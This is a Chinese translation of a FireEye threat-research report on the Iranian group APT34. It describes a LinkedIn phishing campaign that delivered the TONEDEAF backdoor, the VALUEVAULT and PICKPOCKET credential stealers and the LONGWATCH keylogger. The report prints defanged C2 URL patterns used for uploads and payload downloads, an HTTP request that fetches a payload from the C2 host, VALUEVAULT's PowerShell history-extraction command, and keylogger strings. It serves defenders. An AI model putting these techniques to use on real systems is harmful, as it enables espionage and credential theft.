APT34利用LinkedIn钓鱼,其武器库中再添三类恶意软件

作者:   深圳市网安计算机安全检测技术有限公司 2019/07/24 17:23:31 124次阅读 国际
文章来源:https://www.4hou.com/web/19359.html

背景

        APT34被认为是一个为伊朗的国家利益服务的黑客组织,主要侧重于网络间谍活动,至少从2014年开始就一直处于活跃状态。这个组织已经广泛地针对各个行业,包括金融、政府、能源、化工和电信,并且主要集中在中东地区。

        随着中东地缘政治紧张局势的加剧,伊朗对战略情报的需求也变得越来越迫切。我们预计,伊朗在未来将大幅增加网络间谍活动的规模和范围,且很可能从政客和核心组织入手来填补这一空白。这一点从其恶意软件和基础设施的增长上就可以明显看出。

网络钓鱼行动

        在2019年6月下旬,FireEye识别出了一场网络钓鱼行动,并将其归于伊朗威胁组织APT34(又称Oilrig、Cobalt Gypsy),该行动有以下三个关键属性:

· 攻击者伪装成剑桥大学成员的身份以获得受害者信任;

· 使用LinkedIn传递恶意文档;

· 有三类之前未在APT34的武器库中发现的恶意软件。

且本次行动主要针对以下行业:能源和公用事业;政府;油气。

初步分析

        2019年6月19日,FireEye Endpoint Security设备上收到了漏洞检测警报。违规应用程序被识别为Microsoft Excel,并由FireEye Endpoint Security的ExploitGuard引擎立即中止。 ExploitGuard具有行为监控,检测和预防功能,可监控应用程序行为,查找威胁行为者用来破坏传统检测机制的各种异常情况。随后可以对违规应用程序进行沙盒化或终止,防止漏洞利用进入下一个编程步骤。

        Managed Defense SOC分析了警报,并识别出位于C:\ Users \ <user_name> \.templates中的名为System.doc(MD5:b338baa673ac007d7af54075ea69660b)的恶意文件。文件System.doc的本质上是Windows可移植可执行文件(PE)。FireEye将这类新恶意软件确定为TONEDEAF。

        TONEDEAF是一个后门,使用HTTP GET和POST请求与单个C2服务器通信,支持收集系统信息、上传和下载文件以及任意shell命令执行。执行时,TONEDEAF将加密数据写入两个临时文件temp.txt和temp2.txt,这两个文件在执行时位于同一个目录中。我们将在本文附录中探讨TONEDEAF的其他技术细节。

        回溯到攻击检测之前的步骤,FireEye发现System.doc被一个名为ERFT-Details.xls的文件植入,并找到了ERFT-Details.xls文件的链接:http://www.cam-research-ac [.] com / Documents / ERFT-Details.xls。网络证据显示在该表格下载之前受害者还访问了LinkedIn的消息。与受害者联系后我们得知,文件确实是是通过LinkedIn消息收到的,攻击者伪装成“剑桥大学研究人员”的应聘者“Rebecca Watts”。图1显示了Watts女士的求职留言。

APT34利用LinkedIn钓鱼,其武器库中再添三类恶意软件

图1:链接实际引导向TONEDEAF

        这不是我们第一次看到APT34在各类行动中伪装成学术人员求职的样子,对话通常发生在社交媒体平台上,如果目标组织将重点放在电子邮件防御上,那么社交媒体平台可能就是一种有效的传递机制。

FireEye检查了原始文件ERFT-Details.xls,该文件至少有两个唯一的MD5文件哈希值:

· 96feed478c347d4b95a8224de26a1b2c

· caf418cbf6a9c4e93e79d4714d5d3b87

文件是base64编码的,打开后会在目标目录中创建System.doc,用于创建的VBA代码片段如图2所示。

APT34利用LinkedIn钓鱼,其武器库中再添三类恶意软件

图2:System.doc中的VBA代码片段

此Excel文档还会创建一个名为“windows update check”的计划任务,每分钟运行文件C:\Users\<user_name>\.templates\System Manager.exe一次,最后的VBA函数会将System.doc重命名为System Manager.exe。创建计划任务、模糊处理以避免简单检测的VBA代码片段如图3所示。

APT34利用LinkedIn钓鱼,其武器库中再添三类恶意软件

图3:System.doc中的其他VBA代码

首次执行TONEDEAF时,FireEye通过端口80确定了对C2服务器offlineearthquake [.] com的回调。

进一步挖掘

        在确定offlineearthquake [.] com作为潜在C2域后,FireEye在可见范围内进行了更广泛的搜索,并发现了另外两个在该域上的恶意软件,分别名为VALUEVAULT和LONGWATCH,还确定了PICKPOCKET(一种浏览器凭证盗窃工具)的一种变体。

        对offlineéarthquake[.] com的请求可以采取多种形式,具体取决于恶意软件的安装和目的。此外,在安装过程中,恶意软件会检索系统和当前用户名,这些用户名用于创建三个字符的“sys_id”。此值用于后续请求,可能会跟踪受感染的目标活动。网址的结构如下:

· hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000

· hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000

· hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000

· hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000

在C2上识别的第一个可执行文件是WinNTProgram.exe(MD5:021a0f57fe09116a43c27e5133a57a0a),FireEye标识为LONGWATCH。 LONGWATCH是一个键盘记录器,可以将键盘记录输出到Window的临时文件夹中的log.txt文件。 有关LONGWATCH的更多信息,请参阅帖子末尾的恶意软件附录部分。

检索VALUEVAULT的HTTP流量片段如下所示:

GET hxxp://offlineearthquake.com/file/<sys_id>/b.exe?id=<3char_redacted>&n=000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)
AppleWebKit/537.36 (KHTML, like Gecko)
Host: offlineearthquake[.]com
Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1
FireEye将b.exe(MD5:9fff498b78d9498b33e08b892148135f)标识为VALUEVAULT。

        VALUEVAULT是来自Massimiliano Montoro的"Windows Vault Password Dumper"浏览器凭据窃取工具的Golang版本,允许操作人员提取和查看存储在Windows Vault中的凭据,此外VALUEVAULT将调用Windows PowerShell来提取浏览器历史记录,以便将浏览器密码与访问过的站点匹配。有关VALUEVAULT的更多信息,请参见下面的附录。

        另外两个附加文件分别是PE86.dll(MD5:d8abe843db508048b4d4db748f92a103)和PE64.dll(MD5:6eca9c2b7cf12c247032aae28419319e),它们分别是恶意软件PICKPOCKET的64位和32位变体。

        PICKPOCKET是一种凭据窃取工具,可将用户的网站登录凭据从Chrome,Firefox和Internet Explorer转储到文件中。此工具之前曾在2018年的Mandiant事件响应中观察到,迄今为止仅由APT34使用。

结论

        我们有理由相信APT34在未来的威胁行动中还会运用到更多工作,建议相关组织在防御上能下足功夫,保持警惕。

恶意软件附录

TONEDEAF

        TONEDEAF是一个后门,使用HTTP或DNS与命令和控制服务器通信。支持的命令包括系统信息收集、文件上传、文件下载和任意shell命令执行。尽管此后门被编码为能够与硬编码的C2服务器 c[.]cdn-edge-akamai[.]com的DNS请求进行通信,但目前还未配置此功能的使用。图5展示了dns_exfil的程序集CALL指令的片段。创建者可能将此作为作为Plan B,用于未来DNS渗透的一种手段。

APT34利用LinkedIn钓鱼,其武器库中再添三类恶意软件

图4:TONEDEAF二进制代码片段

        除了未在此样本中启用外,DNS隧道功能还有缺失值的错误,使之不能正确执行,比如其中一个错误就在没有考虑Unicode字符串的情况下确定了命令响应字符串的长度。因此当恶意软件执行返回Unicode输出的shell命令时,会发送单个命令响应字节。

VALUEVAULT

VALUEVAULT是Golang版的浏览器凭据窃取工具,其调用Windows PowerShell来提取浏览器历史记录的函数部分片断如下所示:

powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory

执行时,VALUEVAULT在AppData \ Roaming目录下的执行帐户的上下文中创建一个SQLITE数据库文件,名为fsociety.dat,VALUEVAULT将以SQL格式将转储的密码写入此文件。图7显示了fsociety.dat文件的SQL格式。

APT34利用LinkedIn钓鱼,其武器库中再添三类恶意软件

图5:VALUEVAULT fsociety.dat SQLite数据库的SQL格式

VALUEVAULT的函数名没有混淆,在字符串分析中可以直接查看。其他开发人员环境变量可以直接在二进制文件中使用,如下所示。VALUEVAULT不具备执行网络通信的能力,这意味着操作人员需要手动检索工具捕获的输出。

执行VALUEVAULT时提取的Golang文件如下:

C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/new_edge.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/mozila.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/main.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/ie.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go

LONGWATCH

LONGWATCH是域offlineearthquake[.]com上的二进制文件WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a)。它的主要功能是键盘记录程序,能把键盘记录输出到到Windows temp文件夹中的log.txt文件中。

标识的一些键如下:

GetAsyncKeyState
>---------------------------------------------------\n\n
c:\\windows\\temp\\log.txt
[ENTER]
[CapsLock]
[CRTL]
[PAGE_UP]
[PAGE_DOWN]
[HOME]
[LEFT]
[RIGHT]
[DOWN]
[PRINT]
[PRINT SCREEN] (1 space)
[INSERT]
[SLEEP]
[PAUSE]
\n---------------CLIPBOARD------------\n
\n\n >>>  (2 spaces)
c:\\windows\\temp\\log.txt
本文翻译自:https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
指导单位
广东省公安厅网络警察总队 广东省信息安全等级保护协调小组办公室